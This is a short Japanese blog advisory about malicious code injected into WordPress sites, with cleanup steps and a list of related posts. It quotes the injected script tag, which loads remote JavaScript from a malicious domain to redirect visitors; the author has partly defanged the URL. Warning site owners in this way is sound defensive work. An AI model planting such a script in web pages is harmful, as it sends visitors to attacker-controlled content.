【ご注意】WordPressの不正コード改ざん
2017/10/06
WordPressを狙った不正コードによる下記動画のような改ざんが横行しているようです。
下記内容のスクリプトが埋め込まれており、アクセスした人が別ページに飛ばされるといった類のもののようです。
<script type=’text/javascript’ src=’https://sdb.dancewithme.biz/db.js’></script>
※sは故意に全角に変えております
改ざんされた場合は下記の手順で修正してください。
データベース周り
まず、データベースのバックアップをし、データベースの中に入っている不正コードを削除します。
削除したデータをデータベースに戻し、データベースのパスワードも変更しておきましょう。
WordPressでのチェック
まずログインユーザーのパスワードを変更します。
その後、Wordfence Securityプラグインをインストールします。
チェック後異常箇所を変更します。
Sucuri Securityも使ってスクリプトのスキャンをかけておいたほうが良いでしょう。
皆様、ご注意ください。
関連記事
-
-
子カテゴリに親カテゴリのテンプレートを引き継がせる
WordPressって基本的に親カテゴリを指定すると、それにぶら下がっている子カ …
-
-
NextGEN Gallery2.2 日本語化
ここに日本語化ファイルがあるのでダウンロードします。 NextGEN Galle …
-
-
WordPressでよく使うコードまとめ
完全に自分用です。 View the code on Gist.
-
-
WordPressでよく使う新着記事表示のコード
ほんとによく使うので覚え書き。 ちなみにマルチサイトをまたがって新着を取得する場 …
-
-
カスタム投稿を使うときのメモメモφ(..)
カスタム投稿タイプとは 通常の「投稿」「固定ページ」等とは違うタイプの投稿方法。 …
-
-
マルチサイト化でよくあること・・・参加サイトに表示されない!
WordPressでマルチサイト化すると、左上の「参加サイト」にマウスオーバーし …
-
-
別ページのカスタムフィールドの値を取りたいときー
トップページにカスタムフィールドの値を出したい時ってありますよね? そんな時は固 …
-
-
サムネイルをいちいち入れるのめんどくさい人に Default Thumbnail Plus
めんどくさがりやーな「だいすけ」です。 こんにちは。 WordPressのサムネ …
-
-
Sugar Events Calendar Lite 中国語化
以前のブログの再掲載です(なくなると困る記事なので・・・) Sugar Even …
-
-
.htaccessに最低限設定しておいたほうが良いこと
簡単で結構効果のあるセキュリティとして.htaccessの設定がありますが、最低 …